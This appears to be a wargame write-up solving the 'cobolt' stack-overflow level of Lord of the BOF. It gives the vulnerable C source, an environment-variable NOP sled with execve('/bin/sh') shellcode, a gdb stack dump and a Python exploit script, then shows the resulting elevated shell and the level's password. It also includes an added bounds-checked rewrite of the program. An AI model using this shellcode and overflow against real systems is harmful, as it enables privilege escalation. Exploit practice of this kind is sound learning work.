The Fellowship of the BOF – Level 2 (cobolt)

The source of the Level 2 challenge is as follows.

/*
 The Lord of the BOF : The Fellowship of the BOF
 - cobolt
 - small buffer
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[16];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);   /* unbounded copy: an argument longer than 15 bytes overruns buffer */
    printf("%s\n", buffer);
}

Unlike the previous challenge, the buffer in this one is small. In such a case an environment variable can be used to hold the payload. However, a \xff byte cannot be supplied when overwriting the RET address, so avoiding \xff is the crux of this challenge. As in the previous challenge, it can be avoided by inserting a large number of NOPs so that the return address can point somewhere that contains no \xff byte.
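For contrast, here is a bounds-checked version of the program above. This is an added example, not code from the original post or from the LOB challenge: the helper names copy_arg_bounded and check_argument are my own, and the 16-byte buffer size is taken from the challenge source. It shows the one change that removes the bug the writeup relies on: the copy is refused when the argument (plus its NUL terminator) does not fit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not the challenge's code): copy src into dst only if it
 * fits together with its NUL terminator. Returns 0 on success, -1 if src
 * is too long. Refusing is safer than silently truncating, which would
 * hide the problem from the caller. */
int copy_arg_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size)
        return -1;               /* would overrun dst (or leave no room for the NUL) */
    memcpy(dst, src, len + 1);   /* len < dst_size, so the terminator fits */
    return 0;
}

/* Helper for testing: run the check against a 16-byte stack buffer exactly
 * like cobolt's, without the unbounded strcpy. */
int check_argument(const char *src)
{
    char buffer[16];
    return copy_arg_bounded(buffer, sizeof buffer, src);
}

int main(int argc, char *argv[])
{
    char buffer[16];
    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    if (copy_arg_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long: max %zu bytes\n", sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

With this check in place, the 24-byte argument the writeup builds (20 bytes of filler plus a 4-byte return address) is rejected before a single byte is copied, so the saved EBP and return address on the stack are never touched.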

[gremlin@localhost gremlin]$ export SH=`python -c "print '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`
[gremlin@localhost gremlin]$ gdb cobolt_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r
Starting program: /home/gremlin/cobolt_tmp 

Breakpoint 1, 0x8048436 in main ()
(gdb) x/32wx $esp
0xbffe7478: 0xbffe7488 0x0804841b 0x080494ec 0x08049500
0xbffe7488: 0xbffe74a8 0x400309cb 0x00000001 0xbffe74d4
0xbffe7498: 0xbffe74dc 0x40013868 0x00000001 0x08048380
0xbffe74a8: 0x00000000 0x080483a1 0x08048430 0x00000001
0xbffe74b8: 0xbffe74d4 0x080482e0 0x080484ac 0x4000ae60
0xbffe74c8: 0xbffe74cc 0x40013e90 0x00000001 0xbffe75bb
0xbffe74d8: 0x00000000 0xbffe75d4 0xbffe75f6 0xbffe7600
0xbffe74e8: 0xbffe760e 0xbffe762d 0xbffe763d 0xbffe7656
(gdb) 
0xbffe74f8: 0xbffe7673 0xbffe767e 0xbffe768c 0xbffe76cf
0xbffe7508: 0xbffe76e2 0xbffe76f7 0xbffe7707 0xbffe7714
0xbffe7518: 0xbffe7733 0xbffe773e 0xbffffe0b 0xbffffe18
0xbffe7528: 0xbffffe20 0x00000000 0x00000003 0x08048034
0xbffe7538: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffe7548: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffe7558: 0x00000008 0x00000000 0x00000009 0x08048380
0xbffe7568: 0x0000000b 0x000001f5 0x0000000c 0x000001f5
(gdb) 
0xbffe7578: 0x0000000d 0x000001f5 0x0000000e 0x000001f5
0xbffe7588: 0x00000010 0x0febfbff 0x0000000f 0xbffe75b6
0xbffe7598: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe75a8: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffe75b8: 0x2f003638 0x656d6f68 0x6572672f 0x6e696c6d
0xbffe75c8: 0x626f632f 0x5f746c6f 0x00706d74 0x5353454c
0xbffe75d8: 0x4e45504f 0x752f7c3d 0x622f7273 0x6c2f6e69
0xbffe75e8: 0x70737365 0x2e657069 0x25206873 0x53550073
(gdb) 
0xbffe75f8: 0x414e5245 0x003d454d 0x54534948 0x455a4953
0xbffe7608: 0x3030313d 0x4f480030 0x414e5453 0x6c3d454d
0xbffe7618: 0x6c61636f 0x74736f68 0x636f6c2e 0x6f646c61
0xbffe7628: 0x6e69616d 0x474f4c00 0x454d414e 0x6572673d
0xbffe7638: 0x6e696c6d 0x4d455200 0x4845544f 0x3d54534f
0xbffe7648: 0x2e323931 0x2e383631 0x2e383132 0x414d0031
0xbffe7658: 0x2f3d4c49 0x2f726176 0x6f6f7073 0x616d2f6c
0xbffe7668: 0x672f6c69 0x6c6d6572 0x54006e69 0x3d4d5245
(gdb) 
0xbffe7678: 0x756e696c 0x4f480078 0x59545453 0x693d4550
0xbffe7688: 0x00363833 0x48544150 0x73752f3d 0x6f6c2f72
0xbffe7698: 0x2f6c6163 0x3a6e6962 0x6e69622f 0x73752f3a
0xbffe76a8: 0x69622f72 0x752f3a6e 0x582f7273 0x36523131
0xbffe76b8: 0x6e69622f 0x6f682f3a 0x672f656d 0x6c6d6572
0xbffe76c8: 0x622f6e69 0x48006e69 0x3d454d4f 0x6d6f682f
0xbffe76d8: 0x72672f65 0x696c6d65 0x4e49006e 0x52545550
0xbffe76e8: 0x652f3d43 0x692f6374 0x7475706e 0x53006372
(gdb) 
0xbffe76f8: 0x4c4c4548 0x69622f3d 0x61622f6e 0x55006873
0xbffe7708: 0x3d524553 0x6d657267 0x006e696c 0x48534142
0xbffe7718: 0x564e455f 0x6f682f3d 0x672f656d 0x6c6d6572
0xbffe7728: 0x2e2f6e69 0x68736162 0x4c006372 0x3d474e41
0xbffe7738: 0x555f6e65 0x48530053 0x9090903d 0x90909090
0xbffe7748: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7758: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7768: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbffe7778: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7788: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7798: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77d8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77e8: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)

As shown, filling the environment variable with a large number of NOPs lets us avoid an address containing \xff. Now let us write the attack code.

#!/usr/bin/python
import os
from struct import pack

def main():
    # 16-byte buffer + 4-byte saved EBP = 20 bytes of filler, then the
    # return address, pointing into the NOP sled held in the SH environment variable
    payload = 'A'*20 + pack('<L', 0xbffe7778)
    os.execl('/home/gremlin/cobolt', 'cobolt', payload)

if __name__ == '__main__':
    print '[+] Strat'
    main()
    print '[+] End'
[gremlin@localhost gremlin]$ ./ex.py 
[+] Strat
AAAAAAAAAAAAAAAAAAAAxwbash$ id
uid=502(cobolt) gid=501(gremlin) egid=502(cobolt) groups=501(gremlin)
bash$ my-pass
euid = 502
hacking exposed
bash$ 
